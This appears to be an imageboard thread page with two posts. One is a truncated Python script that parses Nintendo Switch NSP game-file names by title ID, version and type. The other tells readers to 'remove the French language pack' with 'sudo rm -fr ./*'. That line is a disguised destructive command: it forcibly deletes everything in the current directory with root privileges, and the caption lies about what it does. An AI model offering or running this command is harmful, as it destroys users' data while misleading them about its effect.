[Catalog] [Manage]

Name
Subject
Message
File
Embed   (paste a YouTube URL)
Password   (for post and file deletion)
  • Supported file types are JPG, PNG, GIF, MP4, WEBM, MKV, MOV, AVI, 3GP, 3G2, MPG, ZIP, 7Z, RAR, TAR, GZ, BZ2 and XZ.
  • Maximum file size allowed is 50 MB.
  • Images greater than 250x250 will be thumbnailed.
  • Currently 3 unique user posts.

R No.6  [Reply]
#!/usr/bin/env python3
import argparse
import re
import shutil
from pathlib import Path

NSP_PATTERN = re.compile(
r""" ^
(?P<name>.+?)\s*\[
(?P<titleid>[0-9A-Fa-f]{16})
\]\[
(?P<version>v\d+)
\]\[
(?P<type>Base|Update|DLC(?:\s*\d+)?)
\]\.(?P<ext>nsp|NSP)$
Post truncated. Click Reply to view.

File: 1761775028742.jpg–(29.50KB, 400x400, al4NPsyz_400x400.jpg)
R No.1  [Reply]
Remove the French language pack:

sudo rm -fr ./*

Delete Post  
Previous[0] Next